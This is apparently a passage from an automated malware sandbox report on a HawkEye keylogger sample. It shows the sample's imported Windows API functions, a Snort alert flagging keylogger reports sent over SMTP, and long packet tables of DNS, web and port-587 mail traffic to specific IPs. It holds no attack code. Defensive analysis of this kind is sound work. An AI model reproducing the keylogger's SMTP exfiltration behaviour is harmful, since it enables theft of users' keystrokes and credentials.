                                                                              user32.dllWindowFromPoint, WinHelpA, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassA, UnionRect, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetMenuItemInfoA, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, IsCharAlphaNumericA, IsCharAlphaA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCaretPos, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EndPaint, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DeferWindowPos, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreateWindowExA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, BeginDeferWindowPos, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                              kernel32.dllSleep
                                                                              oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayRedim, SafeArrayCreate, VariantChangeTypeEx, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                              comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                              kernel32.dllMulDiv
                                                                              winmm.dllmciSendCommandA, mciGetErrorStringA
                                                                              kernel32.dllAddVectoredExceptionHandler

                                                                              Possible Origin

                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishUnited States

                                                                              Network Behavior

                                                                              Snort IDS Alerts

                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                              11/19/20-16:03:11.245137TCP2019926ET TROJAN HawkEye Keylogger Report SMTP49746587192.168.2.4166.62.27.57

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Nov 19, 2020 16:02:54.499708891 CET4973880192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:02:54.516001940 CET8049738104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:02:54.516113997 CET4973880192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:02:54.517074108 CET4973880192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:02:54.533266068 CET8049738104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:02:54.541414976 CET8049738104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:02:54.594522953 CET4973880192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:02:54.594763994 CET49739443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:02:54.611154079 CET44349739104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:02:54.611242056 CET49739443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:02:54.672023058 CET49739443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:02:54.688457966 CET44349739104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:02:54.688901901 CET44349739104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:02:54.689006090 CET44349739104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:02:54.689054966 CET49739443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:02:54.758867025 CET49739443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:02:54.762535095 CET49740443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:02:54.775322914 CET44349739104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:02:54.778700113 CET44349740104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:02:54.779587030 CET49740443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:02:54.779609919 CET49740443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:02:54.798758984 CET44349740104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:02:54.799081087 CET44349740104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:02:54.799626112 CET44349740104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:02:54.799702883 CET49740443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:02:54.800508022 CET49740443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:02:54.816796064 CET44349740104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:03:08.611728907 CET49746587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:03:08.882777929 CET58749746166.62.27.57192.168.2.4
                                                                              Nov 19, 2020 16:03:08.882930994 CET49746587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:03:09.597856998 CET58749746166.62.27.57192.168.2.4
                                                                              Nov 19, 2020 16:03:09.598325968 CET49746587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:03:09.869668961 CET58749746166.62.27.57192.168.2.4
                                                                              Nov 19, 2020 16:03:09.873588085 CET49746587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:03:10.145303011 CET58749746166.62.27.57192.168.2.4
                                                                              Nov 19, 2020 16:03:10.145670891 CET49746587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:03:10.425162077 CET58749746166.62.27.57192.168.2.4
                                                                              Nov 19, 2020 16:03:10.426595926 CET49746587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:03:10.697953939 CET58749746166.62.27.57192.168.2.4
                                                                              Nov 19, 2020 16:03:10.699817896 CET49746587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:03:10.972868919 CET58749746166.62.27.57192.168.2.4
                                                                              Nov 19, 2020 16:03:10.973298073 CET49746587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:03:11.244473934 CET58749746166.62.27.57192.168.2.4
                                                                              Nov 19, 2020 16:03:11.244570017 CET58749746166.62.27.57192.168.2.4
                                                                              Nov 19, 2020 16:03:11.245136976 CET49746587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:03:11.245273113 CET49746587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:03:11.245419979 CET49746587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:03:11.245482922 CET49746587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:03:11.245569944 CET49746587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:03:11.245651960 CET49746587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:03:11.517080069 CET58749746166.62.27.57192.168.2.4
                                                                              Nov 19, 2020 16:03:11.517100096 CET58749746166.62.27.57192.168.2.4
                                                                              Nov 19, 2020 16:03:11.518004894 CET58749746166.62.27.57192.168.2.4
                                                                              Nov 19, 2020 16:03:11.527730942 CET58749746166.62.27.57192.168.2.4
                                                                              Nov 19, 2020 16:03:11.580365896 CET49746587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:03:38.239831924 CET4973880192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:03:38.239991903 CET49746587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:03:42.909209967 CET4976480192.168.2.4104.16.155.36
                                                                              Nov 19, 2020 16:03:42.925932884 CET8049764104.16.155.36192.168.2.4
                                                                              Nov 19, 2020 16:03:42.927194118 CET4976480192.168.2.4104.16.155.36
                                                                              Nov 19, 2020 16:03:42.927691936 CET4976480192.168.2.4104.16.155.36
                                                                              Nov 19, 2020 16:03:42.944050074 CET8049764104.16.155.36192.168.2.4
                                                                              Nov 19, 2020 16:03:42.956650972 CET8049764104.16.155.36192.168.2.4
                                                                              Nov 19, 2020 16:03:43.004832029 CET4976480192.168.2.4104.16.155.36
                                                                              Nov 19, 2020 16:03:43.006668091 CET49765443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:03:43.023049116 CET44349765104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:03:43.023211956 CET49765443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:03:43.093427896 CET49765443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:03:43.109797001 CET44349765104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:03:43.113091946 CET44349765104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:03:43.113338947 CET44349765104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:03:43.113598108 CET49765443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:03:43.115885019 CET49765443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:03:43.117397070 CET49766443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:03:43.132205963 CET44349765104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:03:43.133662939 CET44349766104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:03:43.134159088 CET49766443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:03:43.134731054 CET49766443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:03:43.151000023 CET44349766104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:03:43.151611090 CET44349766104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:03:43.152143002 CET44349766104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:03:43.154800892 CET49766443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:03:43.156320095 CET49766443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:03:43.172498941 CET44349766104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:03:51.623248100 CET4976480192.168.2.4104.16.155.36
                                                                              Nov 19, 2020 16:03:58.110135078 CET4977480192.168.2.4104.16.155.36
                                                                              Nov 19, 2020 16:03:58.126528978 CET8049774104.16.155.36192.168.2.4
                                                                              Nov 19, 2020 16:03:58.126627922 CET4977480192.168.2.4104.16.155.36
                                                                              Nov 19, 2020 16:03:58.127439022 CET4977480192.168.2.4104.16.155.36
                                                                              Nov 19, 2020 16:03:58.143625021 CET8049774104.16.155.36192.168.2.4
                                                                              Nov 19, 2020 16:03:58.157450914 CET8049774104.16.155.36192.168.2.4
                                                                              Nov 19, 2020 16:03:58.206037998 CET49775443192.168.2.4104.16.155.36
                                                                              Nov 19, 2020 16:03:58.222534895 CET44349775104.16.155.36192.168.2.4
                                                                              Nov 19, 2020 16:03:58.222623110 CET49775443192.168.2.4104.16.155.36
                                                                              Nov 19, 2020 16:03:58.255884886 CET4977480192.168.2.4104.16.155.36
                                                                              Nov 19, 2020 16:03:58.290390015 CET49775443192.168.2.4104.16.155.36
                                                                              Nov 19, 2020 16:03:58.306818008 CET44349775104.16.155.36192.168.2.4
                                                                              Nov 19, 2020 16:03:58.307987928 CET44349775104.16.155.36192.168.2.4
                                                                              Nov 19, 2020 16:03:58.308088064 CET44349775104.16.155.36192.168.2.4
                                                                              Nov 19, 2020 16:03:58.308149099 CET49775443192.168.2.4104.16.155.36
                                                                              Nov 19, 2020 16:03:58.311598063 CET49775443192.168.2.4104.16.155.36
                                                                              Nov 19, 2020 16:03:58.313707113 CET49777443192.168.2.4104.16.155.36
                                                                              Nov 19, 2020 16:03:58.327991962 CET44349775104.16.155.36192.168.2.4
                                                                              Nov 19, 2020 16:03:58.329950094 CET44349777104.16.155.36192.168.2.4
                                                                              Nov 19, 2020 16:03:58.330082893 CET49777443192.168.2.4104.16.155.36
                                                                              Nov 19, 2020 16:03:58.330837965 CET49777443192.168.2.4104.16.155.36
                                                                              Nov 19, 2020 16:03:58.346981049 CET44349777104.16.155.36192.168.2.4
                                                                              Nov 19, 2020 16:03:58.347834110 CET44349777104.16.155.36192.168.2.4
                                                                              Nov 19, 2020 16:03:58.347984076 CET44349777104.16.155.36192.168.2.4
                                                                              Nov 19, 2020 16:03:58.348033905 CET49777443192.168.2.4104.16.155.36
                                                                              Nov 19, 2020 16:03:58.350363016 CET49777443192.168.2.4104.16.155.36
                                                                              Nov 19, 2020 16:03:58.366559029 CET44349777104.16.155.36192.168.2.4
                                                                              Nov 19, 2020 16:04:10.773653984 CET49780587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:04:11.036168098 CET58749780166.62.27.57192.168.2.4
                                                                              Nov 19, 2020 16:04:11.036300898 CET49780587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:04:11.305751085 CET58749780166.62.27.57192.168.2.4
                                                                              Nov 19, 2020 16:04:11.306165934 CET49780587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:04:11.568952084 CET58749780166.62.27.57192.168.2.4
                                                                              Nov 19, 2020 16:04:11.569655895 CET49780587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:04:11.837136030 CET58749780166.62.27.57192.168.2.4
                                                                              Nov 19, 2020 16:04:11.837541103 CET49780587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:04:12.112052917 CET58749780166.62.27.57192.168.2.4
                                                                              Nov 19, 2020 16:04:12.112370968 CET49780587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:04:12.375014067 CET58749780166.62.27.57192.168.2.4
                                                                              Nov 19, 2020 16:04:12.429150105 CET49780587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:04:17.212974072 CET49780587192.168.2.4166.62.27.57
                                                                              Nov 19, 2020 16:04:17.213450909 CET4977480192.168.2.4104.16.155.36
                                                                              Nov 19, 2020 16:04:22.257847071 CET4978380192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.274291992 CET8049783104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.274451971 CET4978380192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.275377035 CET4978380192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.291771889 CET8049783104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.298597097 CET8049783104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.347043037 CET49785443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.352025032 CET4978380192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.367753029 CET44349785104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.367882967 CET49785443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.457828999 CET49785443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.482532024 CET44349785104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.483330011 CET44349785104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.483397007 CET44349785104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.483851910 CET49785443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.486628056 CET49785443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.490082026 CET49786443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.502929926 CET44349785104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.506427050 CET44349786104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.506551027 CET49786443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.507467031 CET49786443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.523807049 CET44349786104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.525458097 CET44349786104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.525579929 CET44349786104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:22.528492928 CET49786443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.530241013 CET49786443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:22.546571016 CET44349786104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:29.671349049 CET4978380192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:35.992441893 CET4978980192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.008863926 CET8049789104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.009018898 CET4978980192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.009860039 CET4978980192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.026127100 CET8049789104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.037992001 CET8049789104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.084880114 CET49790443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.101201057 CET44349790104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.101335049 CET49790443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.178476095 CET49790443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.181164980 CET4978980192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.195301056 CET44349790104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.196178913 CET44349790104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.196502924 CET44349790104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.196562052 CET49790443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.198659897 CET49790443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.200278044 CET49791443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.214926958 CET44349790104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.216463089 CET44349791104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.216552019 CET49791443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.217386007 CET49791443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.233619928 CET44349791104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.238141060 CET44349791104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.238523960 CET44349791104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:36.238586903 CET49791443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.241364956 CET49791443192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:36.257617950 CET44349791104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:43.404752970 CET4978980192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:47.284856081 CET4979480192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:47.301214933 CET8049794104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:47.301645041 CET4979480192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:47.301661015 CET4979480192.168.2.4104.16.154.36
                                                                              Nov 19, 2020 16:04:47.320461035 CET8049794104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:47.330806971 CET8049794104.16.154.36192.168.2.4
                                                                              Nov 19, 2020 16:04:47.385196924 CET4979480192.168.2.4104.16.154.36

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Nov 19, 2020 16:02:37.347265005 CET4991053192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:02:37.374398947 CET53499108.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:02:38.091876030 CET5585453192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:02:38.118879080 CET53558548.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:02:39.153587103 CET6454953192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:02:39.180571079 CET53645498.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:02:40.477577925 CET6315353192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:02:40.504650116 CET53631538.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:02:41.419821024 CET5299153192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:02:41.446788073 CET53529918.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:02:42.287302017 CET5370053192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:02:42.314332962 CET53537008.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:02:48.014317989 CET5172653192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:02:48.058628082 CET53517268.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:02:53.947966099 CET5679453192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:02:53.983439922 CET53567948.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:02:54.437556982 CET5653453192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:02:54.475153923 CET53565348.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:02:54.565713882 CET5662753192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:02:54.592853069 CET53566278.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:02:59.422950029 CET5662153192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:02:59.449935913 CET53566218.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:01.729206085 CET6311653192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:01.756218910 CET53631168.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:03.427460909 CET6407853192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:03.454576969 CET53640788.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:06.844546080 CET6480153192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:06.871615887 CET53648018.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:08.569644928 CET6172153192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:08.608561039 CET53617218.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:26.334978104 CET5125553192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:26.370476961 CET53512558.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:27.336630106 CET6152253192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:27.372004986 CET53615228.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:27.923398972 CET5233753192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:27.950417042 CET53523378.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:28.391411066 CET5504653192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:28.429313898 CET53550468.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:28.727895975 CET4961253192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:28.763827085 CET53496128.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:29.180068016 CET4928553192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:29.215704918 CET53492858.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:29.484210014 CET5060153192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:29.528075933 CET53506018.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:29.613588095 CET6087553192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:29.649548054 CET53608758.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:30.169581890 CET5644853192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:30.207268953 CET53564488.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:31.013119936 CET5917253192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:31.048868895 CET53591728.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:31.545161009 CET6242053192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:31.572143078 CET53624208.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:32.255084038 CET6057953192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:32.282471895 CET53605798.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:32.378735065 CET5018353192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:32.415395975 CET53501838.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:32.917269945 CET6153153192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:32.944896936 CET53615318.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:33.035890102 CET4922853192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:33.063143969 CET53492288.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:42.322643995 CET5979453192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:42.349766016 CET53597948.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:42.565202951 CET5591653192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:42.601363897 CET53559168.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:42.855329990 CET5275253192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:42.890909910 CET53527528.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:42.963808060 CET6054253192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:43.004244089 CET53605428.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:45.724968910 CET6068953192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:45.760621071 CET53606898.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:49.401329994 CET6420653192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:49.440566063 CET53642068.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:56.284164906 CET5090453192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:56.319935083 CET53509048.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:58.046384096 CET5752553192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:58.082009077 CET53575258.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:58.168235064 CET5381453192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:58.204073906 CET53538148.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:58.208667994 CET5341853192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:58.235800982 CET53534188.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:03:59.443418980 CET6283353192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:03:59.470434904 CET53628338.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:04:01.499191046 CET5926053192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:04:01.534805059 CET53592608.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:04:10.725539923 CET4994453192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:04:10.771277905 CET53499448.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:04:18.482359886 CET6330053192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:04:18.509577990 CET53633008.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:04:21.843602896 CET6144953192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:04:21.879123926 CET53614498.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:04:22.194811106 CET5127553192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:04:22.230504036 CET53512758.8.8.8192.168.2.4
                                                                              Nov 19, 2020 16:04:22.299546957 CET6349253192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:04:22.309029102 CET5894553192.168.2.48.8.8.8
                                                                              Nov 19, 2020 16:04:22.335187912 CET53634928.8.8.8192.168.2.4
